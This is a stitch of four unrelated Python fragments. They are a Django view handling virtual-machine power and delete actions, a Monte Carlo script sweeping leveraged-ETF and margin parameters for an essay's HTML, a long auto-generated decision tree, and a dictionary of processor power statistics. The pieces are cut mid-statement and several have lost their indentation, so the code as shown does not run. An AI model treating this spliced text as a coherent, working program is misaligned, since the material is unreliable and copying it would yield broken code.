if request.method == 'POST':
if 'start' in request.POST:
conn.start()
return HttpResponseRedirect(request.get_full_path() + '#shutdown')
if 'power' in request.POST:
if 'shutdown' == request.POST.get('power', ''):
conn.shutdown()
return HttpResponseRedirect(request.get_full_path() + '#shutdown')
if 'destroy' == request.POST.get('power', ''):
conn.force_shutdown()
return HttpResponseRedirect(request.get_full_path() + '#forceshutdown')
if 'managedsave' == request.POST.get('power', ''):
conn.managedsave()
return HttpResponseRedirect(request.get_full_path() + '#managedsave')
if 'shutdown' in request.POST:
conn.shutdown()
return HttpResponseRedirect(request.get_full_path() + '#shutdown')
if 'destroy' in request.POST:
conn.force_shutdown()
return HttpResponseRedirect(request.get_full_path() + '#forceshutdown')
if 'managedsave' in request.POST:
conn.managedsave()
return HttpResponseRedirect(request.get_full_path() + '#managedsave')
if 'deletesaveimage' in request.POST:
conn.managed_save_remove()
return HttpResponseRedirect(request.get_full_path() + '#managedsave')
if 'suspend' in request.POST:
conn.suspend()
return HttpResponseRedirect(request.get_full_path() + '#suspend')
if 'resume' in request.POST:
conn.resume()
return HttpResponseRedirect(request.get_full_path() + '#suspend')
if 'delete' in request.POST:
if conn.get_status() == 1:
conn.force_shutdown()
if request.POST.get('delete_disk', ''):
conn.delete_disk()
conn.delete()
return HttpResponseRedirect('/%s/instances' % host_id)
if 'assign_volume' in request.POST:
file = request.POST.get('file', | |
3.0] # only check ratios that are feasible for buying leveraged ETFs (i.e., there are only 2X and 3X funds)
param_sweep_function = lambda use_sat_utility, utility_param: param_sweep_exp_util_M_t( \
THETA_VALUES_FOR_SWEEP, default_market.annual_margin_interest_rate, \
default_market.annual_mu, default_investor.years_until_donate, \
LEV_ETF_EXP_RATIO, C_VALUES_FOR_SWEEP, default_market.annual_sigma, \
NUM_SAMPLES_FROM_M_T_DISTRIBUTION, use_sat_utility, utility_param)
# regular utility
for alpha in [".01", ".25", ".5", ".75", ".9", ".99"]:
print "Getting optimal theta and c for alpha = %s" % alpha
(theta_of_optimum, c_of_optimum, max_exp_util) = param_sweep_function( \
False, float(alpha))
output_text = output_text.replace(REPLACE_STR_FRONT + "optimal_theta_for_alpha=%s" % alpha + REPLACE_STR_END,
str(round(theta_of_optimum,2)))
output_text = output_text.replace(REPLACE_STR_FRONT + "optimal_c_for_alpha=%s" % alpha + REPLACE_STR_END,
str(round(c_of_optimum,2)))
output_text = output_text.replace(REPLACE_STR_FRONT + "exp_util_for_alpha=%s" % alpha + REPLACE_STR_END,
str(round(max_exp_util,2)))
# saturation utility
for saturation_cutoff in ["$500K", "$2 million", "$20 million"]:
print "Getting optimal theta and c for saturation cutoff = %s" % saturation_cutoff
if saturation_cutoff is "$500K":
saturation_as_number = 500000.0
elif saturation_cutoff is "$2 million":
saturation_as_number = 2000000.0
elif saturation_cutoff is "$20 million":
saturation_as_number = 20000000.0
else:
raise Exception("Not a valid saturation-cutoff string")
(theta_of_optimum, c_of_optimum, max_exp_util) = param_sweep_function( \
True, saturation_as_number)
output_text = output_text.replace(REPLACE_STR_FRONT + "optimal_theta_for_cutoff=%s" % saturation_cutoff + REPLACE_STR_END,
str(round(theta_of_optimum,2)))
output_text = output_text.replace(REPLACE_STR_FRONT + "optimal_c_for_cutoff=%s" % saturation_cutoff + REPLACE_STR_END,
str(round(c_of_optimum,2)))
output_text = output_text.replace(REPLACE_STR_FRONT + "exp_util_for_cutoff=%s" % saturation_cutoff + REPLACE_STR_END,
str(round(max_exp_util,2)))
return output_text
def param_sweep_exp_util_M_t(theta_values_to_sweep, r, mu, t, f,
                             c_values_to_sweep, sigma, num_samples,
                             use_sat_utility, utility_param):
    """Grid-search over (theta, c) for the highest expected utility of M_t.

    For every combination of theta (leveraged-ETF share) and c (leverage
    ratio), draw `num_samples` outcomes of final wealth via
    sample_M_t_distribution, apply either the saturation utility or the
    power utility (selected by `use_sat_utility`, parameterized by
    `utility_param`), and average.  Returns the tuple
    (best theta, best c, best expected utility); the -9999/-99999 junk
    placeholders are returned unchanged if the sweep lists are empty.
    """
    if use_sat_utility:
        utility_function = lambda wealth: util.saturation_utility(wealth, utility_param)
    else:
        utility_function = lambda wealth: util.utility(wealth, utility_param)
    best_theta = -9999  # junk placeholder until a real optimum is seen
    best_c = -9999  # junk
    best_exp_util = -99999  # junk
    INITIAL_INVESTMENT = 100000.0
    assert INITIAL_INVESTMENT == 100000.0, "The value 100000.0 is hard-coded into the writeup HTML text."
    for candidate_theta in theta_values_to_sweep:
        for candidate_c in c_values_to_sweep:
            wealth_samples = INITIAL_INVESTMENT * sample_M_t_distribution(
                candidate_theta, r, mu, t, f, candidate_c, sigma, num_samples)
            expected_utility = numpy.average(
                [utility_function(wealth) for wealth in wealth_samples])
            if expected_utility > best_exp_util:
                best_theta = candidate_theta
                best_c = candidate_c
                best_exp_util = expected_utility
    return (best_theta, best_c, best_exp_util)
def sample_M_t_distribution(theta, r, mu, t, f, c, sigma, num_samples):
    """Sample final wealth per initial dollar for a theta-weighted mix.

    The portfolio holds a fraction `theta` in a c-times leveraged ETF
    (expense ratio `f`, financing at rate `r`) and `1 - theta` in the
    unleveraged asset (drift `mu`, volatility `sigma`), both held for
    `t` years.  Each component is drawn from the corresponding lognormal
    terminal-wealth distribution; returns a numpy array of length
    `num_samples`.
    """
    assert theta >= 0 and theta <= 1, "theta isn't in [0,1]"
    # Leveraged leg: drift picks up the margin-financed excess return
    # (mu - r) * c, pays the fund fee f, and takes the usual lognormal
    # volatility drag at c * sigma.
    lev_log_mean = (r + (mu - r) * c) * t - f * t - c ** 2 * sigma ** 2 * t / 2
    lev_log_sd = c * sigma * math.sqrt(t)
    leveraged_samples = numpy.random.lognormal(lev_log_mean, lev_log_sd,
                                               num_samples)
    # Unleveraged leg: plain geometric-Brownian terminal wealth.
    reg_log_mean = mu * t - sigma ** 2 * t / 2
    reg_log_sd = sigma * math.sqrt(t)
    regular_samples = numpy.random.lognormal(reg_log_mean, reg_log_sd,
                                             num_samples)
    return theta * leveraged_samples + (1.0 - theta) * regular_samples
def c_star(alpha, custom_mu=None):
    """c* is optimal leverage. alpha is as in utility(wealth) = wealth^alpha.

    Uses the default Market parameters unless `custom_mu` supplies an
    annual expected return.  Returns (mu - margin rate) / (sigma^2 * (1 - alpha)).
    """
    # Test against None explicitly: the old truthiness check (`if custom_mu:`)
    # silently fell back to the default market when custom_mu was 0.0.
    if custom_mu is not None:
        market = Market.Market(annual_mu=custom_mu)
    else:
        market = Market.Market()
    return (market.annual_mu - market.annual_margin_interest_rate) / \
        (market.annual_sigma ** 2 * (1 - alpha))
"""
DON'T NEED THIS ANYMORE
def throw_out_alphas_where_c_star_is_extreme(alpha_values, c_star_values):
assert len(alpha_values) == len(c_star_values), "Arrays aren't the same size."
assert len(c_star_values) > 5, "This might not work so well for small alpha arrays."
middle_of_c_star_array = len(c_star_values)/2
typical_c_star = c_star_values[middle_of_c_star_array]
MULTIPLE_WHEN_TOO_EXTREME = 10
non_extreme_alphas_and_c_stars = [(alpha, c_star) for (alpha, c_star) in zip(alpha_values, c_star_values) if abs(c_star) <= MULTIPLE_WHEN_TOO_EXTREME * abs(typical_c_star)]
non_extreme_alphas = [alpha for (alpha, c_star) in non_extreme_alphas_and_c_stars]
non_extreme_c_stars = [c_star for (alpha, c_star) in non_extreme_alphas_and_c_stars]
return (non_extreme_alphas, non_extreme_c_stars)
def solve_deriv_wrt_c_equals_zero(alpha):
deriv_with_this_alpha = lambda c : deriv_wrt_c(c,alpha)
GUESS = 1.0
solution = fsolve(deriv_with_this_alpha, GUESS)
assert len(solution) == 1, "Solution array has length other than 1."
return solution[0]
def deriv_wrt_c(c, alpha):
default_investor = Investor.Investor()
default_market = Market.Market()
return math.exp( (default_market.annual_margin_interest_rate + (default_market.annual_mu-default_market.annual_margin_interest_rate) * c) * default_investor.years_until_donate * alpha + (default_market.annual_sigma**2 * c**2/2.0) * default_investor.years_until_donate * (alpha**2 - alpha) ) * ( (default_market.annual_mu-default_market.annual_margin_interest_rate) * default_investor.years_until_donate * alpha + c*default_market.annual_sigma**2 * default_investor.years_until_donate * (alpha**2 - alpha) )
"""
def add_theoretical_calculations_for_no_unemployment_etc(output_text, no_unemployment_etc_results_table_contents):
    """Fill the essay's placeholders with theoretical vs. simulated values.

    Computes closed-form ("theoretical") quantities for the simplified
    no-unemployment scenario from the default Investor/Market parameters,
    parses the corresponding simulated ("actual") values out of the
    results-table HTML, and substitutes both into `output_text` via the
    REPLACE_STR_FRONT/REPLACE_STR_END placeholder markers.  Returns the
    updated HTML text.
    """
    default_investor = Investor.Investor()
    default_market = Market.Market()
    # initial investment for the "no complications" runs
    one_month_pay = default_investor.initial_annual_income_for_investing * \
        (float(margin_leverage.INTEREST_AND_SALARY_EVERY_NUM_DAYS) / \
        margin_leverage.DAYS_PER_YEAR)
    output_text = output_text.replace(REPLACE_STR_FRONT + "one_month_pay" + REPLACE_STR_END,
                                      util.format_as_dollar_string(one_month_pay))
    # Theoretical vs. actual median
    # Median of lognormal terminal wealth discounted at mu: exp(-sigma^2 t / 2).
    theoretical_median_PV_ignoring_complications = one_month_pay * math.exp(-default_market.annual_sigma**2*default_investor.years_until_donate/2)
    output_text = output_text.replace(REPLACE_STR_FRONT + "theoretical_median_PV_ignoring_complications" + REPLACE_STR_END,
                                      util.format_as_dollar_string(theoretical_median_PV_ignoring_complications))
    actual_median_string = parse_value_from_results_table(no_unemployment_etc_results_table_contents, "Regular","Median")
    output_text = output_text.replace(REPLACE_STR_FRONT + "actual_median_ignoring_complications" + REPLACE_STR_END,
                                      actual_median_string)
    # Theoretical vs. actual mean
    theoretical_mean_PV_ignoring_complications = one_month_pay
    output_text = output_text.replace(REPLACE_STR_FRONT + "theoretical_mean_PV_ignoring_complications" + REPLACE_STR_END,
                                      util.format_as_dollar_string(theoretical_mean_PV_ignoring_complications))
    actual_mean_string = parse_value_from_results_table(no_unemployment_etc_results_table_contents, "Regular","Mean ± stderr")
    output_text = output_text.replace(REPLACE_STR_FRONT + "actual_mean_ignoring_complications" + REPLACE_STR_END,
                                      actual_mean_string)
    # sigma_{ln(wealth)}
    actual_sigma_of_log_wealth = parse_value_from_results_table(no_unemployment_etc_results_table_contents, "Regular","σ<sub>ln(wealth)</sub>")
    output_text = output_text.replace(REPLACE_STR_FRONT + "actual_sigma_of_log_wealth" + REPLACE_STR_END,
                                      actual_sigma_of_log_wealth)
    # leverage amount, c
    broker_imposed_leverage_limit = util.max_margin_to_assets_ratio_to_N_to_1_leverage(default_investor.broker_max_margin_to_assets_ratio)
    output_text = output_text.replace(REPLACE_STR_FRONT + "broker_imposed_leverage_limit" + REPLACE_STR_END,
                                      str(round(broker_imposed_leverage_limit,1)))
    # Theoretical vs. actual median for leveraged
    leveraged_theoretical_median_PV_ignoring_complications = one_month_pay *\
        math.exp( (default_market.annual_mu-default_market.annual_margin_interest_rate) * \
        (broker_imposed_leverage_limit-1.0) * default_investor.years_until_donate - \
        broker_imposed_leverage_limit**2 * default_market.annual_sigma**2 * \
        default_investor.years_until_donate/2)
    output_text = output_text.replace(REPLACE_STR_FRONT + "leveraged_theoretical_median_PV_ignoring_complications" + REPLACE_STR_END,
                                      util.format_as_dollar_string(leveraged_theoretical_median_PV_ignoring_complications))
    leveraged_actual_median_string = parse_value_from_results_table(no_unemployment_etc_results_table_contents, "Margin","Median")
    output_text = output_text.replace(REPLACE_STR_FRONT + "leveraged_actual_median_ignoring_complications" + REPLACE_STR_END,
                                      leveraged_actual_median_string)
    # Theoretical vs. actual mean for leveraged
    leveraged_theoretical_mean_PV_ignoring_complications = one_month_pay * \
        math.exp( (default_market.annual_mu-default_market.annual_margin_interest_rate) * \
        (broker_imposed_leverage_limit-1.0) * default_investor.years_until_donate )
    output_text = output_text.replace(REPLACE_STR_FRONT + "leveraged_theoretical_mean_PV_ignoring_complications" + REPLACE_STR_END,
                                      util.format_as_dollar_string(leveraged_theoretical_mean_PV_ignoring_complications))
    leveraged_actual_mean_string = parse_value_from_results_table(no_unemployment_etc_results_table_contents, "Margin","Mean ± stderr")
    # NOTE(review): leveraged_actual_mean is computed but never used below —
    # the full "mean ± stderr" string is substituted instead.  Confirm
    # whether the parsed integer was meant to be used.
    leveraged_actual_mean = get_mean_as_int_from_mean_plus_or_minus_stderr(leveraged_actual_mean_string)
    output_text = output_text.replace(REPLACE_STR_FRONT + "leveraged_actual_mean_ignoring_complications" + REPLACE_STR_END,
                                      leveraged_actual_mean_string)
    # sigma_{ln(wealth)} for leveraged
    leveraged_theoretical_sigma_ln_wealth = broker_imposed_leverage_limit * \
        default_market.annual_sigma * math.sqrt(default_investor.years_until_donate)
    output_text = output_text.replace(REPLACE_STR_FRONT + "leveraged_theoretical_sigma_ln_wealth" + REPLACE_STR_END,
                                      str(round(leveraged_theoretical_sigma_ln_wealth,2)))
    leveraged_actual_sigma_of_log_wealth = parse_value_from_results_table(no_unemployment_etc_results_table_contents, "Margin","σ<sub>ln(wealth)</sub>")
    output_text = output_text.replace(REPLACE_STR_FRONT + "leveraged_actual_sigma_of_log_wealth" + REPLACE_STR_END,
                                      leveraged_actual_sigma_of_log_wealth)
    # Z-value threshold
    Z_value_threshold = math.sqrt(default_investor.years_until_donate) * \
        ((broker_imposed_leverage_limit+1)*default_market.annual_sigma/2 - \
        (default_market.annual_mu - default_market.annual_margin_interest_rate) \
        / default_market.annual_sigma)
    output_text = output_text.replace(REPLACE_STR_FRONT + "Z_value_threshold" + REPLACE_STR_END,
                                      str(round(Z_value_threshold,2)))
    # Prob(Z <= threshold)
    prob_Z_leq_threshold = norm.cdf(Z_value_threshold)
    output_text = output_text.replace(REPLACE_STR_FRONT + "prob_Z_leq_threshold" + REPLACE_STR_END,
                                      str(round(prob_Z_leq_threshold,2)))
    # Prob(Z > threshold)
    prob_Z_gt_threshold = 1.0-prob_Z_leq_threshold
    output_text = output_text.replace(REPLACE_STR_FRONT + "prob_Z_gt_threshold" + REPLACE_STR_END,
                                      str(round(prob_Z_gt_threshold,2)))
    # Actual % times leverage is better
    actual_percent_times_leverage_is_better = parse_percent_times_leverage_is_better(no_unemployment_etc_results_table_contents)
    output_text = output_text.replace(REPLACE_STR_FRONT + "actual_percent_times_leverage_is_better" + REPLACE_STR_END,
                                      actual_percent_times_leverage_is_better)
    return output_text
"""
NOT USING THIS ANYMORE...
def theoretical_median_PV_ignoring_complications():
default_investor = Investor.Investor()
default_market = Market.Market()
initial_monthly_income = default_investor.initial_annual_income_for_investing / 12
total_PV = 0.0
for month in xrange(12 * default_investor.years_until_donate):
cur_monthly_income = initial_monthly_income * (1+default_investor.annual_real_income_growth_percent/100.0)**math.floor(month/12)
discounted_cur_monthly_income = cur_monthly_income * math.exp(- default_market.annual_mu * (month / 12.0))
total_PV += discounted_cur_monthly_income
return total_PV
"""
def add_figures(graph_type, output_text, current_location_of_figure,
                cur_working_dir, use_local_image_file_paths, scenario_abbrev, timestamp):
    """Copy one generated figure next to the essay HTML and link it in.

    If the HTML contains the figure's placeholder marker, the figure is
    copied into `cur_working_dir` under a timestamped name and the
    placeholder is replaced with either the local path or the eventual
    WordPress upload URL (per `use_local_image_file_paths`).  Returns the
    (possibly updated) HTML text.
    """
    placeholder_string_for_figure = REPLACE_STR_FRONT + "{}_{}".format(scenario_abbrev, graph_type) + REPLACE_STR_END
    # Plain substring membership instead of the old
    # re.search(".*{}.*".format(...)): the placeholder text is not a regex,
    # and any metacharacters in the markers would make the search misfire.
    if placeholder_string_for_figure in output_text:  # figure appears in the HTML, so copy it and write its path
        # Copy the graph to be in the same folder as the essay HTML
        new_figure_file_name = "{}_{}_{}.png".format(scenario_abbrev, graph_type, timestamp)
        copy_destination_for_graph = os.path.join(cur_working_dir, new_figure_file_name)
        if os.path.exists(current_location_of_figure):
            shutil.copyfile(current_location_of_figure, copy_destination_for_graph)
        # Replace the path to the optimal-leverage graph in the HTML file
        if use_local_image_file_paths:
            replacement_graph_path = copy_destination_for_graph
        else:  # use WordPress path that will exist once we upload the file
            replacement_graph_path = get_WordPress_img_url_path(timestamp, new_figure_file_name)
        output_text = output_text.replace(placeholder_string_for_figure, replacement_graph_path)
    return output_text
def get_WordPress_img_url_path(timestamp, fig_name):
    """Build the WordPress uploads URL where `fig_name` will live.

    WordPress files land under wp-content/uploads/<year>/<month>/, with
    the year and month taken from the run's timestamp.
    """
    year, month = parse_year_and_month_from_timestamp(timestamp)
    return "http://reducing-suffering.org/wp-content/uploads/{}/{}/{}".format(
        year, month, fig_name)
def parse_year_and_month_from_timestamp(timestamp):
    """Timestamp looks like 2015Apr26_23h09m36s. We want to parse out
    2015 (the year) and 04 (the month), returned as a (year, month)
    pair of strings with the month zero-padded."""
    parsed_time = time.strptime(timestamp, TIMESTAMP_FORMAT)
    return (time.strftime('%Y', parsed_time),
            time.strftime('%m', parsed_time))
def how_much_better_is_margin(results_table_contents, column_name):
    """Compare the Margin row to the Regular row for one table column.

    Parses both rows' "mean ± stderr"-style cells down to integers and
    returns (absolute difference, percent improvement rounded to one
    decimal, margin value as float, regular value as float).
    """
    margin_amount = get_mean_as_int_from_mean_plus_or_minus_stderr(
        parse_value_from_results_table(results_table_contents, "Margin", column_name))
    regular_amount = get_mean_as_int_from_mean_plus_or_minus_stderr(
        parse_value_from_results_table(results_table_contents, "Regular", column_name))
    absolute_gain = margin_amount - regular_amount
    percent_gain = round(100.0 * absolute_gain / regular_amount, 1)
    return (absolute_gain, percent_gain, float(margin_amount), float(regular_amount))
def get_mean_as_int_from_mean_plus_or_minus_stderr(input_string):
    """Convert something like '$37,343 ± $250' to 37343
    This also works for medians."""
    # Strip the dollar signs and thousands separators, then take the
    # first whitespace-separated token (the part before the ± sign).
    cleaned = input_string.replace("$", "").replace(",", "")
    first_token = cleaned.split()[0]
    return int(first_token)
def parse_value_from_results_table(results_table_contents, row_name, column_name):
    """Extract one cell from the HTML results table.

    Finds the <tr> whose first (italicized) cell equals `row_name` and
    returns the value from the column whose header — in the row starting
    with 'Type' — equals `column_name`.

    Raises AssertionError if the data row or header row cannot be found
    (or the matched cell is empty), and Exception if no header column
    matches `column_name`.
    """
    NUM_COLUMNS = 6
    # Header cells are italicized; data cells use the same layout without <i>.
    # (range replaces the Python-2-only xrange; identical here.)
    regex_for_header_columns = "".join([" <td><i>(.+)</i></td>" for _ in range(NUM_COLUMNS)])
    regex_for_columns = regex_for_header_columns.replace("<i>", "").replace("</i>", "")
    # re.escape so a row name containing regex metacharacters matches literally.
    text = '.*<tr><td><i>{}</i></td>{}.*'.format(re.escape(row_name), regex_for_columns)
    matches = re.search(text, results_table_contents)
    assert matches, "Didn't find a match for that row!"
    header_text = '.*<tr><td><i>Type</i></td>{}.*'.format(regex_for_header_columns)
    header_matches = re.search(header_text, results_table_contents)
    assert header_matches, "Didn't match the header!"
    # Group 0 is the whole match; per-column captures start at group 1.
    for group_num in range(1, NUM_COLUMNS + 1):
        if header_matches.group(group_num) == column_name:
            assert matches.group(group_num), "This value is empty!"
            return matches.group(group_num)
    raise Exception("No matching column found")
def parse_percent_times_leverage_is_better(results_table_contents):
    """Pull the percentage (as a string, e.g. '62.5') out of the
    'Leverage is better than regular X% of the time' sentence."""
    pattern = r".*Leverage is better than regular (\d+(\.\d)?)% of the time.*"
    match = re.search(pattern, results_table_contents)
    assert match, "Didn't find a match for % of times margin did better!"
    return match.group(1)
if __name__ == "__main__":
start_time = time.time()
#DATA_ALREADY_EXISTS_AND_HAS_THIS_TIMESTAMP = None
DATA_ALREADY_EXISTS_AND_HAS_THIS_TIMESTAMP = "2015May15_15h57m13s" # 1000 trials of everything; production-ready run
| |
25:
return 2
else:
return 4
else:
return 2
else:
if f4 <= 13:
if f4 <= 10:
if f4 <= 1:
return 2
else:
if f4 <= 6:
return 3
else:
if f4 <= 8:
return 2
else:
return 3
else:
return 2
else:
if f4 <= 30:
if f4 <= 27:
if f4 <= 23:
if f5 <= 10:
if f5 <= 1:
return 3
else:
if f4 <= 19:
if f4 <= 17:
return 3
else:
return 2
else:
return 3
else:
if f4 <= 22:
if f4 <= 18:
return 3
else:
if f4 <= 19:
return 2
else:
return 3
else:
return 3
else:
return 2
else:
return 3
else:
if f5 <= 21:
if f4 <= 31:
return 3
else:
return 2
else:
return 2
else:
if f4 <= 6:
if f4 <= 1:
if f5 <= 27:
return 2
else:
if f3 <= 22:
return 2
else:
return 3
else:
if f3 <= 19:
if f3 <= 17:
return 2
else:
return 3
else:
if f5 <= 18:
return 2
else:
return 0
else:
if f4 <= 19:
if f4 <= 18:
if f3 <= 25:
return 2
else:
if f3 <= 26:
return 3
else:
return 2
else:
if f5 <= 30:
return 2
else:
return 5
else:
if f3 <= 25:
if f4 <= 32:
if f3 <= 21:
if f4 <= 23:
if f3 <= 16:
return 3
else:
return 2
else:
return 2
else:
return 2
else:
if f3 <= 22:
return 2
else:
return 3
else:
if f3 <= 26:
return 3
else:
return 2
else:
if f5 <= 22:
if f3 <= 27:
if f3 <= 22:
if f3 <= 8:
if f5 <= 20:
return 3
else:
return 4
else:
if f6 <= 0:
if f7 <= 8:
return 2
else:
return 8
else:
if f4 <= 2:
return 2
else:
if f3 <= 16:
return 2
else:
if f4 <= 9:
if f4 <= 6:
return 2
else:
if f4 <= 8:
return 4
else:
return 3
else:
if f3 <= 17:
return 3
else:
return 2
else:
if f4 <= 30:
if f3 <= 26:
if f4 <= 9:
return 4
else:
return 0
else:
if f4 <= 14:
if f4 <= 13:
return 3
else:
return 4
else:
return 3
else:
return 4
else:
if f5 <= 3:
return 2
else:
if f4 <= 11:
if f4 <= 1:
return 2
else:
if f4 <= 9:
return 3
else:
return 2
else:
if f3 <= 28:
if f4 <= 20:
return 3
else:
return 2
else:
return 2
else:
if f8 <= 23:
if f3 <= 17:
if f3 <= 16:
if f4 <= 12:
return 2
else:
return 3
else:
if f6 <= 3:
if f7 <= 27:
if f7 <= 22:
if f8 <= 2:
if f7 <= 3:
return 7
else:
return 5
else:
return 5
else:
return 5
else:
return 5
else:
if f6 <= 11:
if f7 <= 21:
return 6
else:
if f7 <= 24:
if f8 <= 21:
return 7
else:
return 8
else:
return 6
else:
if f6 <= 25:
if f7 <= 22:
if f6 <= 12:
return 5
else:
return 6
else:
return 7
else:
if f7 <= 14:
return 6
else:
return 5
else:
return 2
else:
if f7 <= 3:
if f6 <= 2:
if f9 <= 9:
return 7
else:
if f9 <= 11:
return 8
else:
return 7
else:
return 6
else:
if f6 <= 2:
return 5
else:
if f6 <= 11:
if f4 <= 9:
return 2
else:
return 6
else:
if f3 <= 17:
return 5
else:
return 2
else:
if f1 <= 14:
if f2 <= 11:
if f4 <= 8:
if f4 <= 1:
if f6 <= 22:
if f5 <= 3:
if f7 <= 29:
if f6 <= 15:
return 2
else:
if f6 <= 20:
if f7 <= 14:
if f7 <= 12:
return 6
else:
return 7
else:
return 6
else:
return 4
else:
if f5 <= 2:
return 3
else:
return 7
else:
if f3 <= 19:
if f3 <= 17:
return 2
else:
if f7 <= 13:
if f7 <= 11:
return 3
else:
return 2
else:
return 3
else:
return 2
else:
if f3 <= 19:
if f5 <= 3:
if f5 <= 2:
return 3
else:
return 5
else:
return 3
else:
return 2
else:
if f4 <= 6:
return 2
else:
if f3 <= 17:
return 2
else:
if f6 <= 6:
if f6 <= 1:
if f5 <= 25:
if f5 <= 7:
return 5
else:
return 4
else:
return 5
else:
if f5 <= 17:
return 5
else:
return 4
else:
if f6 <= 8:
if f5 <= 29:
return 6
else:
return 5
else:
if f5 <= 26:
if f5 <= 16:
if f8 <= 13:
return 4
else:
return 5
else:
return 4
else:
return 4
else:
if f3 <= 18:
if f4 <= 12:
if f4 <= 11:
return 2
else:
return 3
else:
if f4 <= 32:
if f10 <= 0:
if f3 <= 17:
if f3 <= 15:
if f1 <= 13:
return 3
else:
return 2
else:
return 3
else:
return 2
else:
return 2
else:
return 2
else:
if f4 <= 23:
if f10 <= 0:
if f4 <= 11:
return 2
else:
if f4 <= 21:
if f3 <= 24:
if f3 <= 22:
return 2
else:
return 3
else:
return 2
else:
return 2
else:
return 2
else:
if f3 <= 24:
if f5 <= 17:
return 2
else:
if f5 <= 25:
return 4
else:
return 2
else:
if f5 <= 1:
return 4
else:
return 2
else:
if f3 <= 18:
if f3 <= 11:
if f3 <= 3:
if f3 <= 2:
return 2
else:
if f4 <= 20:
if f4 <= 10:
return 2
else:
if f4 <= 11:
return 2
else:
if f4 <= 18:
return 4
else:
return 2
else:
if f4 <= 32:
return 1
else:
return 2
else:
if f2 <= 12:
if f5 <= 17:
if f5 <= 14:
if f5 <= 1:
return 1
else:
if f3 <= 9:
return 2
else:
return 1
else:
return 1
else:
if f4 <= 18:
return 1
else:
return 2
else:
if f1 <= 13:
return 2
else:
return 1
else:
if f9 <= 0:
if f3 <= 17:
if f3 <= 15:
return 2
else:
if f2 <= 15:
if f3 <= 16:
return 2
else:
return 1
else:
return 2
else:
if f2 <= 15:
if f4 <= 19:
if f4 <= 18:
return 2
else:
return 1
else:
return 2
else:
return 2
else:
if f4 <= 26:
if f3 <= 17:
if f3 <= 16:
return 2
else:
if f2 <= 15:
return 1
else:
return 2
else:
return 2
else:
if f4 <= 31:
return 2
else:
if f3 <= 15:
return 5
else:
return 2
else:
if f3 <= 27:
if f3 <= 24:
if f3 <= 22:
if f2 <= 16:
if f6 <= 18:
return 1
else:
if f3 <= 20:
return 1
else:
if f9 <= 1:
return 1
else:
return 2
else:
if f1 <= 13:
return 2
else:
return 1
else:
return 2
else:
if f4 <= 9:
return 1
else:
if f3 <= 26:
if f3 <= 25:
return 1
else:
return 2
else:
return 1
else:
if f3 <= 30:
return 2
else:
return 3
else:
if f1 <= 16:
if f2 <= 18:
return 0
else:
if f1 <= 15:
if f2 <= 19:
if f5 <= 0:
return 0
else:
return 2
else:
| |
Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.496534,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 10.1286,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0205376,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.21882,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.110006,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.332358,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.536081,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.270596,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.13903,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.363257,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.72826,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0207825,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0139406,
